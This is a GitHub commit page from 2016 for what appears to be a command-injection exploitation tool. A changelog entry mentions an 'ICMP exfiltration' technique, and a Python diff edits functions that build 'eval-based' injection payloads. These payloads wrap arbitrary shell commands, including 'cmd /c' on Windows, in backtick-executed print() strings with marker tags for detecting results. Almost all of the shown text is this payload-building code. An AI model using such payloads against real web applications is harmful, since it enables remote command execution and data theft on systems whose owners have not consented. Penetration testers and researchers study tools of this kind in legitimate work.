Skip to content

Commit

Permalink
Minor fix for payload(s) in "eval-based" techninque.
Browse files Browse the repository at this point in the history
  • Loading branch information
@stasinopoulos
stasinopoulos committed Mar 15, 2016
1 parent 695c89e commit 5a63749
Show file tree
Hide file tree
Showing 2 changed files with 9 additions and 8 deletions.
1 change: 1 addition & 0 deletions readme/CHANGELOG.md
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,5 @@
## Version 0.5b [2016]
* Fixed: The payload(s) for dynamic code evaluation ("eval-based"), if there is not any separator.
* Added: Support for verbose mode in the "ICMP exfiltration" injection technique (module).
* Added: Check if the user-defined os name, is different than the one identified by heuristics.
* Added: New option "--os" that forces a user-defined os name.
Expand Down
16 changes: 8 additions & 8 deletions src/core/injections/results_based/techniques/eval_based/eb_payloads.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -32,7 +32,7 @@ def decision(separator, TAG, randv1, randv2):
"set /a (" + str(randv1) + "%2B" + str(randv2) + ")" +
"\"') do @set /p =%i <nul`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B" +
"`echo " + TAG + "`)" +
separator
)
else:
Expand All @@ -48,7 +48,7 @@ def decision(separator, TAG, randv1, randv2):
payload = ("print(`echo " + TAG + "`." +
"`echo $((" + str(randv1) + "%2B" + str(randv2) + "))`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B" +
"`echo " + TAG + "`)" +
separator
)
else:
Expand All @@ -70,7 +70,7 @@ def decision_alter_shell(separator, TAG, randv1, randv2):
payload = ("print(`echo " + TAG + "`." +
"` cmd /c " + python_payload + "`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B" +
"`echo " + TAG + "`)" +
separator
)
else:
Expand All @@ -85,7 +85,7 @@ def decision_alter_shell(separator, TAG, randv1, randv2):
payload = ("print(`echo " + TAG + "`." +
"` " + python_payload + "`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B" +
"`echo " + TAG + "`)" +
separator
)
else:
Expand All @@ -111,7 +111,7 @@ def cmd_execution(separator, TAG, cmd):
"`echo " + TAG + "`." +
"` cmd /c " + cmd + "`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B"
"`echo " + TAG + "`)"
)

else:
Expand All @@ -127,7 +127,7 @@ def cmd_execution(separator, TAG, cmd):
"`echo " + TAG + "`." +
"`" + cmd + "`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B"
"`echo " + TAG + "`)"
)
else:
payload = ("print(`echo '" + TAG + "'" +
Expand Down Expand Up @@ -158,7 +158,7 @@ def cmd_execution_alter_shell(separator, TAG, cmd):
"`echo " + TAG + "`." +
"` cmd /c " + python_payload + "`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B"
"`echo " + TAG + "`)"
)
else:
payload = ("print(`echo '" + TAG + "'" +
Expand All @@ -173,7 +173,7 @@ def cmd_execution_alter_shell(separator, TAG, cmd):
"`echo " + TAG + "`." +
"`" + cmd + "`." +
"`echo " + TAG + "`." +
"`echo " + TAG + "`)%3B"
"`echo " + TAG + "`)"
)
else:
payload = ("print(`echo '" + TAG + "'" +
Expand Down

0 comments on commit 5a63749

Please sign in to comment.